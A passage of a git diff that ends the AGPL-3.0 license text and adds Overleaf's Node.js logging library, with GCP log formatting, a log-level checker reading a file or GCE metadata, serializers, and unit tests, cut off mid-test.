because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/libraries/logger/buildscript.txt b/libraries/logger/buildscript.txt new file mode 100644 index 0000000..afe93c2 --- /dev/null +++ b/libraries/logger/buildscript.txt @@ -0,0 +1,10 @@ +logger +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/logger/gcp-manager.js b/libraries/logger/gcp-manager.js new file mode 100644 index 0000000..99fe6d4 --- /dev/null +++ b/libraries/logger/gcp-manager.js @@ -0,0 +1,133 @@ +const bunyan = require('bunyan') + +/** + * When we copy log entry fields, omit some bunyan core fields that are not + * interesting, that have a special meaning in GCP, or that we will process + * separately. + */ +const ENTRY_FIELDS_TO_OMIT = [ + 'level', + 'name', + 'hostname', + 'v', + 'pid', + 'msg', + 'err', + 'error', + 'req', + 'res', +] + +/** + * Convert a bunyan log entry to a format that GCP understands + */ +function convertLogEntry(entry) { + const gcpEntry = omit(entry, ENTRY_FIELDS_TO_OMIT) + + // Error information. In GCP, the stack trace goes in the message property. + // This enables the error reporting feature. + const err = entry.err || entry.error + if (err) { + if (err.info) { + Object.assign(gcpEntry, err.info) + } + if (err.code) { + gcpEntry.code = err.code + } + if (err.signal) { + gcpEntry.signal = err.signal + } + const stack = err.stack + if (stack && stack !== '(no stack)') { + gcpEntry.message = stack + } else if (err.message) { + gcpEntry.message = err.message + } + if (entry.name) { + gcpEntry.serviceContext = { service: entry.name } + } + } + + // Log message + if (entry.msg) { + if (gcpEntry.message) { + // A message has already been extracted from the error. Keep the extra + // message in the msg property. + gcpEntry.msg = entry.msg + } else { + gcpEntry.message = entry.msg + } + } + + // Severity + if (entry.level) { + gcpEntry.severity = bunyan.nameFromLevel[entry.level] + } + + // HTTP request information + if (entry.req || entry.res || entry.responseTimeMs) { + const httpRequest = {} + if (entry.req) { + const req = entry.req + httpRequest.requestMethod = req.method + httpRequest.requestUrl = req.url + httpRequest.remoteIp = req.remoteAddress + if (req.headers) { + if (req.headers['content-length']) { + httpRequest.requestSize = parseInt(req.headers['content-length'], 10) + } + httpRequest.userAgent = req.headers['user-agent'] + httpRequest.referer = req.headers.referer + } + } + + if (entry.res) { + const res = entry.res + httpRequest.status = res.statusCode + if (res.headers && res.headers['content-length']) { + if (res.headers['content-length']) { + httpRequest.responseSize = parseInt(res.headers['content-length'], 10) + } + } + } + + if (entry.responseTimeMs) { + const responseTimeSec = entry.responseTimeMs / 1000 + httpRequest.latency = `${responseTimeSec}s` + } + gcpEntry.httpRequest = httpRequest + } + + // Labels are indexed in GCP. We copy the project, doc and user ids to labels to enable fast filtering + const projectId = + gcpEntry.projectId || + gcpEntry.project_id || + (entry.req && entry.req.projectId) + const userId = + gcpEntry.userId || gcpEntry.user_id || (entry.req && entry.req.userId) + const docId = + gcpEntry.docId || gcpEntry.doc_id || (entry.req && entry.req.docId) + if (projectId || userId || docId) { + const labels = {} + if (projectId) { + labels.projectId = projectId + } + if (userId) { + labels.userId = userId + } + if (docId) { + labels.docId = docId + } + gcpEntry['logging.googleapis.com/labels'] = labels + } + + return gcpEntry +} + +function omit(obj, excludedFields) { + return Object.fromEntries( + Object.entries(obj).filter(([key]) => !excludedFields.includes(key)) + ) +} + +module.exports = { convertLogEntry } diff --git a/libraries/logger/index.js b/libraries/logger/index.js new file mode 100755 index 0000000..6cd6f9e --- /dev/null +++ b/libraries/logger/index.js @@ -0,0 +1 @@ +module.exports = require('./logging-manager.js') diff --git a/libraries/logger/log-level-checker.js b/libraries/logger/log-level-checker.js new file mode 100644 index 0000000..fd2f984 --- /dev/null +++ b/libraries/logger/log-level-checker.js @@ -0,0 +1,60 @@ +const { fetchString } = require('@overleaf/fetch-utils') +const fs = require('node:fs') + +class LogLevelChecker { + constructor(logger, defaultLevel) { + this.logger = logger + this.defaultLevel = defaultLevel + } + + start() { + // check for log level override on startup + this.checkLogLevel() + // re-check log level every minute + this.checkInterval = setInterval(this.checkLogLevel.bind(this), 1000 * 60) + this.checkInterval.unref() + } + + stop() { + clearInterval(this.checkInterval) + } + + async checkLogLevel() { + try { + const end = await this.getTracingEndTime() + if (end > Date.now()) { + this.logger.level('trace') + } else { + this.logger.level(this.defaultLevel) + } + } catch (e) { + this.logger.level(this.defaultLevel) + } + } + + async getTracingEndTime() { + return 0 + } +} + +class FileLogLevelChecker extends LogLevelChecker { + async getTracingEndTime() { + const strEndTime = await fs.promises.readFile('/logging/tracingEndTime') + return parseInt(strEndTime, 10) + } +} + +class GCEMetadataLogLevelChecker extends LogLevelChecker { + async getTracingEndTime() { + const options = { + headers: { + 'Metadata-Flavor': 'Google', + }, + } + const uri = `http://metadata.google.internal/computeMetadata/v1/project/attributes/${this.logger.fields.name}-setLogLevelEndTime` + const strEndTime = await fetchString(uri, options) + return parseInt(strEndTime, 10) + } +} + +module.exports = { FileLogLevelChecker, GCEMetadataLogLevelChecker } diff --git a/libraries/logger/logging-manager.js b/libraries/logger/logging-manager.js new file mode 100644 index 0000000..edf922b --- /dev/null +++ b/libraries/logger/logging-manager.js @@ -0,0 +1,186 @@ +const Stream = require('node:stream') +const bunyan = require('bunyan') +const GCPManager = require('./gcp-manager') +const Serializers = require('./serializers') +const { + FileLogLevelChecker, + GCEMetadataLogLevelChecker, +} = require('./log-level-checker') + +const LoggingManager = { + /** + * @param {string} name - The name of the logger + */ + initialize(name) { + this.isProduction = + (process.env.NODE_ENV || '').toLowerCase() === 'production' + const isTest = (process.env.NODE_ENV || '').toLowerCase() === 'test' + this.defaultLevel = + process.env.LOG_LEVEL || + (this.isProduction ? 'info' : isTest ? 'fatal' : 'debug') + this.loggerName = name + this.logger = bunyan.createLogger({ + name, + serializers: { + err: Serializers.err, + error: Serializers.err, + req: Serializers.req, + res: Serializers.res, + }, + streams: [this._getOutputStreamConfig()], + }) + this._setupRingBuffer() + this._setupLogLevelChecker() + return this + }, + + /** + * @param {Record|string} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] - Optional message + * @signature `debug(attributes, message)` + * @signature `debug(message)` + */ + debug(attributes, message, ...args) { + return this.logger.debug(attributes, message, ...args) + }, + + /** + * @param {Record|string} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + * @signature `info(attributes, message)` + * @signature `info(message)` + */ + info(attributes, message, ...args) { + return this.logger.info(attributes, message, ...args) + }, + + /** + * @param {Record} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + */ + error(attributes, message, ...args) { + if (this.ringBuffer !== null && Array.isArray(this.ringBuffer.records)) { + attributes.logBuffer = this.ringBuffer.records.filter(function (record) { + return record.level !== 50 + }) + } + this.logger.error(attributes, message, ...Array.from(args)) + }, + + /** + * Alias to the error method. + * @param {Record} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + */ + err(attributes, message, ...args) { + return this.error(attributes, message, ...args) + }, + + /** + * @param {Record|string} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + * @signature `warn(attributes, message)` + * @signature `warn(message)` + */ + warn(attributes, message, ...args) { + return this.logger.warn(attributes, message, ...args) + }, + + /** + * @param {Record} attributes - Attributes to log (nice serialization for err, req, res) + * @param {string} [message] + */ + fatal(attributes, message) { + this.logger.fatal(attributes, message) + }, + + _getOutputStreamConfig() { + switch (process.env.LOGGING_FORMAT) { + case 'gke': { + const stream = new Stream.Writable({ + objectMode: true, + write(entry, encoding, callback) { + const gcpEntry = GCPManager.convertLogEntry(entry) + // eslint-disable-next-line no-console + console.log(JSON.stringify(gcpEntry, bunyan.safeCycles())) + setImmediate(callback) + }, + }) + return { level: this.defaultLevel, type: 'raw', stream } + } + case 'gce': { + const { LoggingBunyan } = require('@google-cloud/logging-bunyan') + return new LoggingBunyan({ + logName: this.loggerName, + serviceContext: { service: this.loggerName }, + }).stream(this.defaultLevel) + } + default: { + return { level: this.defaultLevel, stream: process.stdout } + } + } + }, + + _setupRingBuffer() { + this.ringBufferSize = parseInt(process.env.LOG_RING_BUFFER_SIZE) || 0 + if (this.ringBufferSize > 0) { + this.ringBuffer = new bunyan.RingBuffer({ limit: this.ringBufferSize }) + this.logger.addStream({ + level: 'trace', + type: 'raw', + stream: this.ringBuffer, + }) + } else { + this.ringBuffer = null + } + }, + + _setupLogLevelChecker() { + const logLevelSource = ( + process.env.LOG_LEVEL_SOURCE || 'file' + ).toLowerCase() + + if (this.logLevelChecker) { + this.logLevelChecker.stop() + this.logLevelChecker = null + } + + if (this.isProduction) { + switch (logLevelSource) { + case 'file': + this.logLevelChecker = new FileLogLevelChecker( + this.logger, + this.defaultLevel + ) + break + case 'gce_metadata': + this.logLevelChecker = new GCEMetadataLogLevelChecker( + this.logger, + this.defaultLevel + ) + break + case 'none': + break + default: + // eslint-disable-next-line no-console + console.log(`Unrecognised log level source: ${logLevelSource}`) + } + if (this.logLevelChecker) { + this.logLevelChecker.start() + } + } + }, +} + +LoggingManager.initialize('default') + +function handleWarning(err) { + LoggingManager.warn({ err }, 'Warning details') +} + +process.on('warning', handleWarning) +LoggingManager.removeWarningHandler = () => { + process.off('warning', handleWarning) +} + +module.exports = LoggingManager diff --git a/libraries/logger/package.json b/libraries/logger/package.json new file mode 100644 index 0000000..0e7fd2d --- /dev/null +++ b/libraries/logger/package.json @@ -0,0 +1,39 @@ +{ + "name": "@overleaf/logger", + "homepage": "www.overleaf.com", + "description": "A centralised logging system for Overleaf", + "repository": { + "type": "git", + "url": "https://github.com/overleaf/overleaf" + }, + "main": "index.js", + "license": "AGPL-3.0-only", + "version": "3.1.1", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@google-cloud/logging-bunyan": "^5.1.0", + "@overleaf/fetch-utils": "*", + "@overleaf/o-error": "*", + "bunyan": "^1.8.14" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + }, + "peerDependencies": { + "@overleaf/metrics": "*" + } +} diff --git a/libraries/logger/serializers.js b/libraries/logger/serializers.js new file mode 100644 index 0000000..d6831a0 --- /dev/null +++ b/libraries/logger/serializers.js @@ -0,0 +1,83 @@ +const OError = require('@overleaf/o-error') + +function errSerializer(err) { + if (!err) { + return err + } + let message = err.message + if (err.path) { + // filter paths from the message to avoid duplicate errors with different path in message + // (e.g. errors from `fs` methods which have a path attribute) + message = message.replace(` '${err.path}'`, '') + } + return { + message, + name: err.name, + stack: OError.getFullStack(err), + info: OError.getFullInfo(err), + code: err.code, + signal: err.signal, + path: err.path, + } +} + +function reqSerializer(req) { + if (!req) { + return req + } + const headers = req.headers || {} + const entry = { + method: req.method, + url: req.originalUrl || req.url, + remoteAddress: getRemoteIp(req), + headers: { + referer: headers.referer || headers.referrer, + 'user-agent': headers['user-agent'], + 'content-length': headers['content-length'], + }, + } + if (req.params) { + const projectId = + req.params.projectId || req.params.project_id || req.params.Project_id + const userId = req.params.userId || req.params.user_id + const docId = req.params.docId || req.params.doc_id + if (projectId) { + entry.projectId = projectId + } + if (userId) { + entry.userId = userId + } + if (docId) { + entry.docId = docId + } + } + return entry +} + +function resSerializer(res) { + if (!res) { + return res + } + return { + statusCode: res.statusCode, + headers: { + 'content-length': res.getHeader && res.getHeader('content-length'), + }, + } +} + +function getRemoteIp(req) { + if (req.ip) { + return req.ip + } + if (req.socket) { + if (req.socket.socket && req.socket.socket.remoteAddress) { + return req.socket.socket.remoteAddress + } else if (req.socket.remoteAddress) { + return req.socket.remoteAddress + } + } + return null +} + +module.exports = { err: errSerializer, req: reqSerializer, res: resSerializer } diff --git a/libraries/logger/test/setup.js b/libraries/logger/test/setup.js new file mode 100644 index 0000000..eb16fac --- /dev/null +++ b/libraries/logger/test/setup.js @@ -0,0 +1,16 @@ +const chai = require('chai') +const sinonChai = require('sinon-chai') +const SandboxedModule = require('sandboxed-module') + +// Chai configuration +chai.should() +chai.use(sinonChai) + +SandboxedModule.configure({ + globals: { Buffer, JSON, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/logger/test/unit/log-level-checker-tests.js b/libraries/logger/test/unit/log-level-checker-tests.js new file mode 100644 index 0000000..64ae6d9 --- /dev/null +++ b/libraries/logger/test/unit/log-level-checker-tests.js @@ -0,0 +1,186 @@ +const Path = require('node:path') +const { promisify } = require('node:util') +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') + +const MODULE_PATH = Path.join(__dirname, '../../log-level-checker.js') +const DEFAULT_LEVEL = 'warn' +const TRACE_LEVEL = 'trace' +const TRACING_END_TIME_FILE = '/logging/tracingEndTime' +const NOW = 10000 +const PAST = NOW - 1000 +const FUTURE = NOW + 1000 + +const delay = promisify(setTimeout) + +describe('LogLevelChecker', function () { + beforeEach(function () { + this.logger = { + level: sinon.stub(), + fields: { name: 'myapp' }, + } + this.FetchUtils = { + fetchString: sinon.stub(), + } + this.fetchLogLevelEndTimeStub = this.FetchUtils.fetchString.withArgs( + 'http://metadata.google.internal/computeMetadata/v1/project/attributes/myapp-setLogLevelEndTime', + { headers: { 'Metadata-Flavor': 'Google' } } + ) + this.fetchLogLevelEndTimeStub.resolves('') + + this.fs = { + promises: { + readFile: sinon.stub(), + }, + } + + this.clock = sinon.useFakeTimers(NOW) + + this.module = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/fetch-utils': this.FetchUtils, + fs: this.fs, + }, + }) + }) + + afterEach(function () { + this.clock.restore() + }) + + describe('FileLogLevelChecker', function () { + beforeEach(function () { + this.logLevelChecker = new this.module.FileLogLevelChecker( + this.logger, + DEFAULT_LEVEL + ) + }) + + describe('when the file is empty', function () { + setupTracingEndTimeFile('') + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe("when the file can't be read", function () { + beforeEach(async function () { + this.fs.promises.readFile.rejects(new Error('Read error!')) + }) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('when the file has a timestamp in the future', function () { + setupTracingEndTimeFile(FUTURE.toString()) + checkLogLevel() + expectLevelSetTo(TRACE_LEVEL) + }) + + describe('when the file has a timestamp in the past', function () { + setupTracingEndTimeFile(PAST.toString()) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('interval checker', function () { + beforeEach(function () { + this.fs.promises.readFile.resolves('') + this.logLevelChecker.start() + }) + + afterEach(function () { + this.logLevelChecker.stop() + }) + + it('checks the file every minute', async function () { + this.clock.tick(1000) + // Yield to the event loop + await delay(0) + expect(this.logger.level).to.have.been.calledOnceWithExactly( + DEFAULT_LEVEL + ) + this.logger.level.reset() + + // Trace until 1.5 minutes in the future + const traceUntil = NOW + 90000 + this.fs.promises.readFile.resolves(traceUntil.toString()) + + this.clock.tick(61000) + await delay(0) + expect(this.logger.level).to.have.been.calledOnceWithExactly( + TRACE_LEVEL + ) + this.logger.level.reset() + + this.clock.tick(60000) + await delay(0) + expect(this.logger.level).to.have.been.calledOnceWithExactly( + DEFAULT_LEVEL + ) + }) + }) + }) + + describe('GCEMetadataLogLevelChecker', function () { + beforeEach(function () { + this.logLevelChecker = new this.module.GCEMetadataLogLevelChecker( + this.logger, + DEFAULT_LEVEL + ) + }) + + describe('when the response is empty', function () { + setupTracingEndTimeGCE('') + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('when the request errors', function () { + beforeEach(async function () { + this.FetchUtils.fetchString.rejects(new Error('Read error!')) + }) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + + describe('when the response is a timestamp in the future', function () { + setupTracingEndTimeGCE(FUTURE.toString()) + checkLogLevel() + expectLevelSetTo(TRACE_LEVEL) + }) + + describe('when the response is a timestamp in the past', function () { + setupTracingEndTimeGCE(PAST.toString()) + checkLogLevel() + expectLevelSetTo(DEFAULT_LEVEL) + }) + }) +}) + +function setupTracingEndTimeFile(contents) { + beforeEach(`set tracing end time in file to ${contents}`, function () { + this.fs.promises.readFile.withArgs(TRACING_END_TIME_FILE).resolves(contents) + }) +} + +function setupTracingEndTimeGCE(contents) { + beforeEach( + `set tracing end time in GCE metadata to ${contents}`, + function () { + this.fetchLogLevelEndTimeStub.resolves(contents) + } + ) +} + +function checkLogLevel() { + beforeEach('Check log level', async function () { + await this.logLevelChecker.checkLogLevel() + }) +} + +function expectLevelSetTo(level) { + it(`sets the log level to ${level}`, function () { + expect(this.logger.level).to.have.been.calledWith(level) + }) +} diff --git a/libraries/logger/test/unit/logging-manager-tests.js b/libraries/logger/test/unit/logging-manager-tests.js new file mode 100644 index 0000000..9b571c3 --- /dev/null +++ b/libraries/logger/test/unit/logging-manager-tests.js @@ -0,0 +1,202 @@ +const SandboxedModule = require('sandboxed-module') +const bunyan = require('bunyan') +const { expect } = require('chai') +const path = require('node:path') +const sinon = require('sinon') + +const MODULE_PATH = path.join(__dirname, '../../logging-manager.js') + +describe('LoggingManager', function () { + beforeEach(function () { + this.start = Date.now() + this.bunyanLogger = { + addStream: sinon.stub(), + debug: sinon.stub(), + error: sinon.stub(), + fatal: sinon.stub(), + info: sinon.stub(), + level: sinon.stub(), + warn: sinon.stub(), + } + this.Bunyan = { + createLogger: sinon.stub().returns(this.bunyanLogger), + RingBuffer: bunyan.RingBuffer, + } + this.stackdriverStreamConfig = { stream: 'stackdriver' } + this.stackdriverClient = { + stream: sinon.stub().returns(this.stackdriverStreamConfig), + } + this.GCPLogging = 